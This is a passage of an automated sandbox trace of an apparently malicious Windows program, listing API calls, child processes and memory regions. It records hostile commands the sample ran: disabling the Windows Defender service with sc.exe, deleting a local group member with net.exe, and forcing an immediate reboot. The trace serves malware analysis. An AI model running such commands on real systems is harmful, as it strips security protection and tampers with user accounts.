SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0228.904] ExpandEnvironmentStringsW (in: lpSrc="cmd /k echo a > \"C:\\Users\\Public\\N3Eg\\uc\"", lpDst=0x25e08c, nSize=0x400 | out: lpDst="cmd /k echo a > \"C:\\Users\\Public\\N3Eg\\uc\"") returned 0x2a [0228.904] ShellExecuteExW (in: pExecInfo=0x25e858*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd", lpParameters="/k echo a > \"C:\\Users\\Public\\N3Eg\\uc\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x25e858*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd", lpParameters="/k echo a > \"C:\\Users\\Public\\N3Eg\\uc\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0228.981] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0228.981] ExpandEnvironmentStringsW (in: lpSrc="cmd /k shutdown -r -t 0 -f", lpDst=0x25e08c, nSize=0x400 | out: lpDst="cmd /k shutdown -r -t 0 -f") returned 0x1b [0228.982] ShellExecuteExW (in: pExecInfo=0x25e858*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd", lpParameters="/k shutdown -r -t 0 -f", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x25e858*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd", lpParameters="/k shutdown -r -t 0 -f", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0229.027] GetCurrentThreadId () returned 0x8c0 [0229.028] ISystemDebugEventFire:IsActive (This=0x3aa900) returned 0x1 [0229.028] GetCurrentThreadId () returned 0x8c0 [0229.029] IUnknown:Release (This=0x3b48d0) returned 0x0 [0229.030] ISystemDebugEventFire:EndSession (This=0x3aa900) returned 0x0 [0229.030] IUnknown:Release (This=0x3aa900) returned 0x1 [0229.030] GetUserDefaultLCID () returned 0x409 [0229.030] GetACP () returned 0x4e4 [0229.031] IUnknown:Release (This=0x3aa900) returned 0x0 [0229.031] SendMessageA (hWnd=0x20170, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0 [0229.031] SendMessageA (hWnd=0x20170, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0 [0229.032] PostMessageA (hWnd=0x20170, Msg=0x12, wParam=0x0, lParam=0x0) returned 1 [0229.033] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x25f9d0*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0229.033] CloseHandle (hObject=0xd4) returned 1 [0229.035] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x25f9f0 | out: lplpMessageFilter=0x25f9f0*=0x2a12c8) returned 0x0 [0229.035] CoUninitialize () [0229.035] DllCanUnloadNow () returned 0x0 [0229.035] DllCanUnloadNow () returned 0x0 [0229.035] DllCanUnloadNow () returned 0x0 [0229.036] DllCanUnloadNow () returned 0x0 [0229.053] ExitProcess (uExitCode=0x0) Thread: id = 97 os_tid = 0x8c4 Thread: id = 98 os_tid = 0x490 [0226.152] GetClassInfoA (in: hInstance=0x80000, lpClassName="WSH-Timer", lpWndClass=0x186fae0 | out: lpWndClass=0x186fae0) returned 0 [0226.152] RegisterClassA (lpWndClass=0x186fae0) returned 0x2ac111 [0226.152] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0x80000, lpParam=0x2a23e0) returned 0x20170 [0226.152] GetWindowLongA (hWnd=0x20170, nIndex=-21) returned 0 [0226.152] DefWindowProcA (hWnd=0x20170, Msg=0x24, wParam=0x0, lParam=0x186f6e4) returned 0x0 [0226.152] GetWindowLongA (hWnd=0x20170, nIndex=-21) returned 0 [0226.152] SetWindowLongA (hWnd=0x20170, nIndex=-21, dwNewLong=2761696) returned 0 [0226.153] DefWindowProcA (hWnd=0x20170, Msg=0x81, wParam=0x0, lParam=0x186f6cc) returned 0x1 [0226.154] GetWindowLongA (hWnd=0x20170, nIndex=-21) returned 2761696 [0226.154] DefWindowProcA (hWnd=0x20170, Msg=0x83, wParam=0x0, lParam=0x186f704) returned 0x0 [0226.175] GetWindowLongA (hWnd=0x20170, nIndex=-21) returned 2761696 [0226.175] DefWindowProcA (hWnd=0x20170, Msg=0x1, wParam=0x0, lParam=0x186f6cc) returned 0x0 [0226.175] SetEvent (hEvent=0xcc) returned 1 [0226.218] GetMessageA (in: lpMsg=0x186fb08, hWnd=0x20170, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x186fb08) returned 0 [0229.031] GetWindowLongA (hWnd=0x20170, nIndex=-21) returned 2761696 [0229.031] GetWindowLongA (hWnd=0x20170, nIndex=-21) returned 2761696 Thread: id = 99 os_tid = 0x478 Thread: id = 100 os_tid = 0x488 Thread: id = 103 os_tid = 0x268 Thread: id = 104 os_tid = 0x948 Thread: id = 105 os_tid = 0x968 Thread: id = 107 os_tid = 0x990 Thread: id = 113 os_tid = 0x9c8 Thread: id = 115 os_tid = 0x690 Process: id = "8" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x7f09e500" os_pid = "0x960" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x494" cmd_line = "\"C:\\Windows\\System32\\sc.exe\" config WinDefend start= disabled" cur_dir = "C:\\Windows\\system32\\" Region: id = 1160 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1161 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1162 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1163 start_va = 0x80000 end_va = 0xbffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1164 start_va = 0xec0000 end_va = 0xecbfff entry_point = 0xec7997 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" Region: id = 1165 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 1166 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 1167 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1168 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1169 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1170 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1171 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1172 start_va = 0xc0000 end_va = 0x126fff entry_point = 0xc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 1173 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1174 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1175 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 1176 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 1177 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x766649e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 1178 start_va = 0x76bf0000 end_va = 0x76c90fff entry_point = 0x76c22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 1179 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 1180 start_va = 0x773d0000 end_va = 0x773e8fff entry_point = 0x773d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 1181 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 106 os_tid = 0x994 [0227.915] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbf7cc | out: lpSystemTimeAsFileTime=0xbf7cc*(dwLowDateTime=0xe2ccf740, dwHighDateTime=0x1d204ef)) [0227.915] GetCurrentProcessId () returned 0x960 [0227.915] GetCurrentThreadId () returned 0x994 [0227.915] GetTickCount () returned 0x4054d [0227.915] QueryPerformanceCounter (in: lpPerformanceCount=0xbf7c4 | out: lpPerformanceCount=0xbf7c4*=16438683644714) returned 1 [0227.915] GetModuleHandleA (lpModuleName=0x0) returned 0xec0000 [0227.915] __set_app_type (_Type=0x1) [0227.915] __p__fmode () returned 0x770131f4 [0227.915] __p__commode () returned 0x770131fc [0227.916] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xec79c7) returned 0x0 [0227.916] __wgetmainargs (in: _Argc=0xec9020, _Argv=0xec9028, _Env=0xec9024, _DoWildCard=0, _StartInfo=0xec9034 | out: _Argc=0xec9020, _Argv=0xec9028, _Env=0xec9024) returned 0 [0227.917] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.920] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0227.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0227.920] wcsncmp (_String1="config", _String2="\\\\", _MaxCount=0x2) returned 7 [0227.920] _wcsicmp (_String1="config", _String2="query") returned -14 [0227.920] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0227.920] _wcsicmp (_String1="config", _String2="start") returned -16 [0227.920] _wcsicmp (_String1="config", _String2="pause") returned -13 [0227.920] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0227.920] _wcsicmp (_String1="config", _String2="control") returned -14 [0227.920] _wcsicmp (_String1="config", _String2="continue") returned -14 [0227.920] _wcsicmp (_String1="config", _String2="stop") returned -16 [0227.921] _wcsicmp (_String1="config", _String2="config") returned 0 [0227.921] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x22f0f8 [0227.998] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0227.998] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0227.998] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0227.998] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0227.998] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0227.998] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0227.998] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0227.998] OpenServiceW (hSCManager=0x22f0f8, lpServiceName="WinDefend", dwDesiredAccess=0x3) returned 0x22f058 [0227.998] QueryServiceConfig2W (in: hService=0x22f058, dwInfoLevel=0x3, lpBuffer=0xbf6b4, cbBufSize=0x4, pcbBytesNeeded=0xbf6a8 | out: lpBuffer=0xbf6b4, pcbBytesNeeded=0xbf6a8) returned 1 [0227.999] ChangeServiceConfig2W (hService=0x22f058, dwInfoLevel=0x3, lpInfo=0xbf6b4) returned 1 [0228.122] ChangeServiceConfigW (in: hService=0x22f058, dwServiceType=0xffffffff, dwStartType=0x4, dwErrorControl=0xffffffff, lpBinaryPathName=0x0, lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0, lpDisplayName=0x0 | out: lpdwTagId=0x0) returned 1 [0228.139] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0xbf660, nSize=0x2, Arguments=0xbf66c | out: lpBuffer="♈#\x0b䋒ìᡜì༄\x1f\x01") returned 0x22 [0228.140] GetFileType (hFile=0x7) returned 0x2 [0228.140] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xbf634 | out: lpMode=0xbf634) returned 1 [0228.140] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x232648*, nNumberOfCharsToWrite=0x22, lpNumberOfCharsWritten=0xbf650, lpReserved=0x0 | out: lpBuffer=0x232648*, lpNumberOfCharsWritten=0xbf650*=0x22) returned 1 [0228.141] LocalFree (hMem=0x232648) returned 0x0 [0228.141] LocalFree (hMem=0x0) returned 0x0 [0228.141] CloseServiceHandle (hSCObject=0x22f058) returned 1 [0228.141] CloseServiceHandle (hSCObject=0x22f0f8) returned 1 [0228.147] exit (_Code=0) Thread: id = 109 os_tid = 0x6ac Process: id = "9" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x7f09e540" os_pid = "0x6b0" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x494" cmd_line = "\"C:\\Windows\\System32\\net.exe\" localgroup HomeUsers /delete DSsDPMx042" cur_dir = "C:\\Windows\\system32\\" Region: id = 1182 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1183 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1184 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1185 start_va = 0x130000 end_va = 0x147fff entry_point = 0x134905 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" Region: id = 1186 start_va = 0x270000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1187 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 1188 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 1189 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1190 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1191 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1197 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1198 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1199 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 1200 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1201 start_va = 0x490000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1202 start_va = 0x6dca0000 end_va = 0x6dcacfff entry_point = 0x6dca12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" Region: id = 1203 start_va = 0x72080000 end_va = 0x72091fff entry_point = 0x72081200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" Region: id = 1204 start_va = 0x72300000 end_va = 0x72306fff entry_point = 0x7230128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" Region: id = 1205 start_va = 0x72310000 end_va = 0x7232bfff entry_point = 0x7231a431 region_type = mapped_file name = "IPHLPAPI.DLL" filename = "\\Windows\\System32\\IPHLPAPI.DLL" Region: id = 1206 start_va = 0x73b20000 end_va = 0x73b2efff entry_point = 0x73b2125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" Region: id = 1207 start_va = 0x73b30000 end_va = 0x73b3efff entry_point = 0x73b312a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" Region: id = 1208 start_va = 0x73b40000 end_va = 0x73b48fff entry_point = 0x73b415a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" Region: id = 1209 start_va = 0x751f0000 end_va = 0x75208fff entry_point = 0x751f1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" Region: id = 1210 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 1211 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 1212 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x766649e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 1213 start_va = 0x76bf0000 end_va = 0x76c90fff entry_point = 0x76c22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 1214 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 1215 start_va = 0x77340000 end_va = 0x77345fff entry_point = 0x77341782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" Region: id = 1216 start_va = 0x773d0000 end_va = 0x773e8fff entry_point = 0x773d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 1217 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 108 os_tid = 0x954 Process: id = "10" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x7f09e580" os_pid = "0x9bc" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x6b0" cmd_line = "C:\\Windows\\system32\\net1 localgroup HomeUsers /delete DSsDPMx042" cur_dir = "C:\\Windows\\system32\\" Region: id = 1218 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1219 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1220 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1221 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1222 start_va = 0xa70000 end_va = 0xa99fff entry_point = 0xa72188 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" Region: id = 1223 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 1224 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 1225 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1226 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1227 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1228 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1229 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1230 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 1231 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 1232 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1233 start_va = 0x6dca0000 end_va = 0x6dcacfff entry_point = 0x6dca12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" Region: id = 1234 start_va = 0x72e10000 end_va = 0x72e27fff entry_point = 0x72e11335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" Region: id = 1235 start_va = 0x73720000 end_va = 0x73728fff entry_point = 0x73721229 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" Region: id = 1236 start_va = 0x73b20000 end_va = 0x73b2efff entry_point = 0x73b2125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" Region: id = 1237 start_va = 0x73b30000 end_va = 0x73b3efff entry_point = 0x73b312a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" Region: id = 1238 start_va = 0x73b40000 end_va = 0x73b48fff entry_point = 0x73b415a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" Region: id = 1239 start_va = 0x73b50000 end_va = 0x73b60fff entry_point = 0x73b51300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" Region: id = 1240 start_va = 0x740d0000 end_va = 0x740e1fff entry_point = 0x740d4795 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" Region: id = 1241 start_va = 0x74c70000 end_va = 0x74c91fff entry_point = 0x74c753e9 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" Region: id = 1242 start_va = 0x751f0000 end_va = 0x75208fff entry_point = 0x751f1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" Region: id = 1243 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 1244 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 1245 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x766649e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 1246 start_va = 0x76bf0000 end_va = 0x76c90fff entry_point = 0x76c22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 1247 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 1248 start_va = 0x77340000 end_va = 0x77345fff entry_point = 0x77341782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" Region: id = 1249 start_va = 0x773d0000 end_va = 0x773e8fff entry_point = 0x773d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 1250 start_va = 0x773f0000 end_va = 0x77424fff entry_point = 0x773f145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" Region: id = 1251 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1255 start_va = 0x3d0000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 1256 start_va = 0x4d0000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1257 start_va = 0x6c3c0000 end_va = 0x6c3c1fff entry_point = 0x6c3c0000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" Region: id = 1258 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1259 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 110 os_tid = 0x66c [0228.708] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfe14 | out: lpSystemTimeAsFileTime=0xcfe14*(dwLowDateTime=0xe3335260, dwHighDateTime=0x1d204ef)) [0228.708] GetCurrentProcessId () returned 0x9bc [0228.708] GetCurrentThreadId () returned 0x66c [0228.708] GetTickCount () returned 0x407ec [0228.708] QueryPerformanceCounter (in: lpPerformanceCount=0xcfe0c | out: lpPerformanceCount=0xcfe0c*=16438685117272) returned 1 [0228.709] GetModuleHandleA (lpModuleName=0x0) returned 0xa70000 [0228.709] __set_app_type (_Type=0x1) [0228.709] __p__fmode () returned 0x770131f4 [0228.713] __p__commode () returned 0x770131fc [0228.713] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa7ffe6) returned 0x0 [0228.714] __getmainargs (in: _Argc=0xa89064, _Argv=0xa8906c, _Env=0xa89068, _DoWildCard=0, _StartInfo=0xa89024 | out: _Argc=0xa89064, _Argv=0xa8906c, _Env=0xa89068) returned 0 [0228.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0228.714] GetConsoleOutputCP () returned 0x1b5 [0228.715] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa89080 | out: lpCPInfo=0xa89080) returned 1 [0228.715] SetThreadUILanguage (LangId=0x0) returned 0x409 [0228.717] sprintf_s (in: _DstBuf=0xcfdcc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0228.717] setlocale (category=0, locale=".437") returned="English_United States.437" [0228.719] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.719] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0228.719] GetCommandLineW () returned="C:\\Windows\\system32\\net1 localgroup HomeUsers /delete DSsDPMx042" [0228.719] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfb98, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe") returned 0x1c [0228.719] _wcsnicmp (_String1="/YES", _String2="/delete", _MaxCount=0x7) returned 21 [0228.719] _wcsnicmp (_String1="/NO", _String2="/delete", _MaxCount=0x7) returned 10 [0228.719] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfd9c | out: Buffer=0xcfd9c*=0x2be540) returned 0x0 [0228.720] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfd9c | out: Buffer=0xcfd9c*=0x2be558) returned 0x0 [0228.720] _fileno (_File=0x77012900) returned 0 [0228.720] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0228.720] _wcsicmp (_String1="accounts", _String2="localgroup") returned -11 [0228.720] _wcsicmp (_String1="computer", _String2="localgroup") returned -9 [0228.720] _wcsicmp (_String1="config", _String2="localgroup") returned -9 [0228.720] _wcsicmp (_String1="continue", _String2="localgroup") returned -9 [0228.720] _wcsicmp (_String1="cont", _String2="localgroup") returned -9 [0228.720] _wcsicmp (_String1="file", _String2="localgroup") returned -6 [0228.720] _wcsicmp (_String1="files", _String2="localgroup") returned -6 [0228.720] _wcsicmp (_String1="group", _String2="localgroup") returned -5 [0228.720] _wcsicmp (_String1="groups", _String2="localgroup") returned -5 [0228.720] _wcsicmp (_String1="help", _String2="localgroup") returned -4 [0228.720] _wcsicmp (_String1="helpmsg", _String2="localgroup") returned -4 [0228.720] _wcsicmp (_String1="localgroup", _String2="localgroup") returned 0 [0228.720] _wcsicmp (_String1="accounts", _String2="HomeUsers") returned -7 [0228.720] _wcsicmp (_String1="computer", _String2="HomeUsers") returned -5 [0228.720] _wcsicmp (_String1="config", _String2="HomeUsers") returned -5 [0228.720] _wcsicmp (_String1="continue", 